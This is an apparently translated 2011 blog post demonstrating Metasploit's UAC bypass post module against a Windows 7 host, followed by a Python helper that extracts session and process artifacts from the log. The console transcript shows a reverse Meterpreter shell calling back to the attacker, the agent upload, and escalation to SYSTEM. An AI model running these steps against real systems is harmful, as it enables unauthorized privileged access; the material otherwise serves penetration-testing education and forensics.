Thursday, January 6, 2011

Windows UAC Bypass in Metasploit

The Windows UAC bypass was added to Metasploit Framework today. It works a bit differently from the traditional script: instead of interacting with meterpreter and running the commands from the meterpreter shell, you have to use the new post modules. Let's see how it is done:

[*] Started reverse handler on 0.0.0.0:443
[*] Starting the payload handler…
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 1 opened (172.16.32.128:443 ->  172.16.32.130:1989) at Thu Jan 06  12:40:35 -0500 2011

msf exploit(handler) > use post/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     no        Host
RPORT    4444             no        Port
SESSION                   yes       The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1

msf post(bypassuac) > exploit

[*] Started reverse handler on 172.16.32.128:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 172.16.32.130
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (172.16.32.128:4444 -> 172.16.32.130:1993) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
meterpreter >

...and we get access as SYSTEM (via technique 1).

meterpreter > sysinfo
Computer: JOHN-DEV-PC
OS      : Windows 7 (Build 7600, ).
Arch    : x64 (Current Process is WOW64)
Language: en_US
meterpreter >
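The transcript above records every host-side artifact the module leaves behind (the uploaded agent with its random name, the handler endpoint it calls back to, and the notepad.exe process the session migrated into). The helper below, added here as an example and not part of the original post or of Metasploit, pulls that inventory out of a saved console log so a tester can verify cleanup or a responder can confirm what was observed; the sample log is constructed from the lines shown above.

```python
import re

# Constructed sample: a subset of the console lines from the transcript above.
SAMPLE_LOG = """\
[*] Meterpreter session 1 opened (172.16.32.128:443 -> 172.16.32.130:1989) at Thu Jan 06 12:40:35 -0500 2011
[*] Uploading the bypass UAC executable to the filesystem...
[*] Executing the agent with endpoint 172.16.32.128:4444 with UACBypass in effect...
[*] Meterpreter session 2 opened (172.16.32.128:4444 -> 172.16.32.130:1993) at Thu Jan 06 12:41:13 -0500 2011
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)
"""

SESSION_RE = re.compile(r"Meterpreter session (\d+) opened \((\S+) -> (\S+)\)")
PROCESS_RE = re.compile(r"(Current|New) server process: (\S+) \((\d+)\)")
ENDPOINT_RE = re.compile(r"agent with endpoint (\S+)")


def extract_artifacts(log: str) -> dict:
    """Parse a Metasploit console log and return the artifacts it records.

    sessions: each session with its handler (attacker) and target socket pairs
    dropped:  images the agent ran as before migrating (the uploaded executable)
    final:    image and PID the session ended up in after migration
    endpoints: callback endpoints the agent was told to connect to
    """
    sessions, dropped, endpoints = [], [], []
    final = None
    for line in log.splitlines():
        if m := SESSION_RE.search(line):
            sessions.append({"id": int(m.group(1)), "handler": m.group(2), "target": m.group(3)})
        elif m := PROCESS_RE.search(line):
            proc = {"image": m.group(2), "pid": int(m.group(3))}
            if m.group(1) == "Current":
                dropped.append(proc)   # the process the agent started in
            else:
                final = proc           # where the session lives after migration
        elif m := ENDPOINT_RE.search(line):
            endpoints.append(m.group(1))
    return {"sessions": sessions, "dropped": dropped, "final": final, "endpoints": endpoints}


if __name__ == "__main__":
    for key, value in extract_artifacts(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```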

*Translated from http://www.secmaniac.com/january-2011/windows-uac-bypass-now-in-metasploit/
